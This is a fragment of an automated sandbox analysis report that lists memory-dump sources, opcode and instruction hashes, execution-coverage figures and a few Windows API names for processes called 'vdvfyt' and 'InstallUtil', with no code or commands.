                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e394b1893f9e15cc715784745dce3dd568e0b58601097956a301f24cc5c9e83f
                                                                                    • Instruction ID: 0968dfa53824839c618461961e0e1ceadc045a89f53f2fdb28e2ee113da2bf09
                                                                                    • Opcode Fuzzy Hash: e394b1893f9e15cc715784745dce3dd568e0b58601097956a301f24cc5c9e83f
                                                                                    • Instruction Fuzzy Hash: CCE086719081459FCB90CBACD5416ACBFE0DB0A228F1446D99D58CB792CB725943CB41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851553956.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5ce0000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a31394f1db1045cb5071dd0c950c34651006702de46da98b9d92289d95efe367
                                                                                    • Instruction ID: fc2cea534a67e3e467399e1da13c7887ff95c346d1d33229d6c829cb628b195f
                                                                                    • Opcode Fuzzy Hash: a31394f1db1045cb5071dd0c950c34651006702de46da98b9d92289d95efe367
                                                                                    • Instruction Fuzzy Hash: 05D0A77050D208EBC704CB98D601ABCB7BCEB46344F14849CD81957341CE33AE12D750
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f020fdd7097c3a3a75433a94b098d2eb0f6225d3f03d1c5bbb6bcd96279ed96e
                                                                                    • Instruction ID: 2644bd83ed7e635b1d68156a042615468c550ca2fb44e9ef1a1e413241c6e060
                                                                                    • Opcode Fuzzy Hash: f020fdd7097c3a3a75433a94b098d2eb0f6225d3f03d1c5bbb6bcd96279ed96e
                                                                                    • Instruction Fuzzy Hash: 86E01230A0530CEFCB40EFA9D50169DB7F5EB84204F105198D909D3745EA315F0097D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851553956.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5ce0000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 94d3782ec0fde8669f4be820dc426549599694b684ed429d7977401cf7dcbd29
                                                                                    • Instruction ID: 022afa87f8f2af1d56beaee63950f703f0a11dc70193545f9b77b92f3618ebdc
                                                                                    • Opcode Fuzzy Hash: 94d3782ec0fde8669f4be820dc426549599694b684ed429d7977401cf7dcbd29
                                                                                    • Instruction Fuzzy Hash: 09C02B7110530447C1943BFC7E0D33C7BE8AB06125F440810F11D804404EB81040C67F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853689131.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6860000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 02185a9d63674cf31d086b32e90f5ca9f29369558ab8442725f8a79ea96bb5d0
                                                                                    • Instruction ID: ce3b2e00c7f96e41d3e9e91b64ef1edf56474f104d3b1671bbcdd61e924813fd
                                                                                    • Opcode Fuzzy Hash: 02185a9d63674cf31d086b32e90f5ca9f29369558ab8442725f8a79ea96bb5d0
                                                                                    • Instruction Fuzzy Hash: F2D067789143588FDB91DF20E885759BBB6AB09318F209096941DA7315CB7459C8CF45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c9de6ec66841af58a3c5e8ecea50dea1b812d3975b3461a07d7625a4baf4c7cb
                                                                                    • Instruction ID: c0af566a9f1e5e26c5327c70738166c4180aa48cb4866d72f5732c941ca76646
                                                                                    • Opcode Fuzzy Hash: c9de6ec66841af58a3c5e8ecea50dea1b812d3975b3461a07d7625a4baf4c7cb
                                                                                    • Instruction Fuzzy Hash: 79C04C5441E7C16EE31227200C105826EA96D8722878A57C750D1952D295080994D6A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853689131.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6860000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0cda7af30993cbef0b2bdbb6c2e2c6ecad43c19218673cdc4ec6097587c8c9fe
                                                                                    • Instruction ID: 910e5bb9c1d2dee587564cbde194a83754f66138d737fdf39bfd9e0632ec51db
                                                                                    • Opcode Fuzzy Hash: 0cda7af30993cbef0b2bdbb6c2e2c6ecad43c19218673cdc4ec6097587c8c9fe
                                                                                    • Instruction Fuzzy Hash: 02C04C76E1012E9BCF00DBD9F9508DCFB74EF94321F404036D214A7104D6301526CF58
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd

                                                                                    Execution Graph

                                                                                    Execution Coverage:11%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:187
                                                                                    Total number of Limit Nodes:19
                                                                                    execution_graph: node and edge listing omitted. API calls reached by the graph nodes: CallWindowProcW, GetModuleHandleW, GlobalMemoryStatusEx, DuplicateHandle, CreateWindowExW
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3378418107.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_6580000_InstallUtil.jbxd